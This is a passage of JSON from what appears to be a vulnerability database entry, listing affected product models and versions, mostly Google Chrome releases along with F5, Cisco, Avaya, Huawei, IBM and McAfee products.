"version": "13.0.769.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.127" }, { "model": "gaia embedded r75.40vs", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.785.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.225" }, { "model": "secureplatform r77.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.385.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.319.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.908.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.62" }, { "model": "oceanstor s5600 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.219" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.374.0" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.52" }, { "model": "secureplatform r77", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.86" }, { "model": "secureplatform r75.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.40" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1043" }, { "model": "rack server rh2288 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.8" }, { "model": "move antivirus agentless", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.604.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.44" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.35" }, { "model": "secureplatform r70", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.150" }, { "model": "gaia embedded r71.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "vcenter orchestrator appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.756.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.34" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.886.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.123" }, { "model": "ipso r75.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "worklight quality assurance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "oceanstor s2200t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.51" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "gaia embedded r77.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.233" }, { "model": "nvp", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.88" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "oceanstor s6800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.955.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1082.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.760.0" }, { "model": "secure access link", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.110" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.12" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1658.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.368.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.23" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.594.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.118" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "gaia embedded r75.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.743.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.8" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.2" }, { "model": "finesse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.96365" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.83" }, { "model": "2054-e01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.816.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.88" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.13" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.393.0" }, { "model": "e9000 blade server ch140 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.362.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.618.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.628.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.56" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.815.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.423.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.8" }, { "model": "system storage san80b-4 2498-b80", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.802.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.12" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.46" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "oceanstor s5500t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.323.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.804.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.77" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.370.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.95" }, { "model": "espace uc v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.805.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.789.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.315" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.512.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.901.0" }, { "model": "t520 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "gaia r75.46", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura application server sip core pb23", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.0" }, { "model": "associates api management", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.729.0" }, { "model": "secureplatform r75.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.102" }, { "model": "isoc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.15" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "8700" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.483.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.467.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.10" }, { "model": "secureplatform r70.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.25" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "qip", "scope": "eq", "trust": 0.3, "vendor": "alcatel lucent", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.452.1" }, { "model": "ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.5" }, { "model": "e9000 blade server ch242 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1017" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.727.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.748.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.7" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.89" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.1.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.379.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.654.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.72" }, { "model": "oceanstor s5500t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4" }, { "model": "rack server rh2285h v100r002c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.8" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.73" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.334.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.862.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.37" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.303" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.721.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.0" }, { "model": "system storage san384b-2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-416" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1030" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.132" }, { "model": "uma-db v100r001c00spc302", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.336" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.32" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.211" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.602.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.2" }, { "model": "2054-e04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "virtualization provisioning service", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "espace usm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1058.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.415.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.931.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.722.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.520.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1022" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.5.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.651.0" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "oceanstor s6800t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.109" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "secure access link gas", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.476.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.61" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.1" }, { "model": "oceanstor s5600t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.354.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.690.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.570.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.347.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.13" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.412.0" }, { "model": "chrome", "scope": "eq", 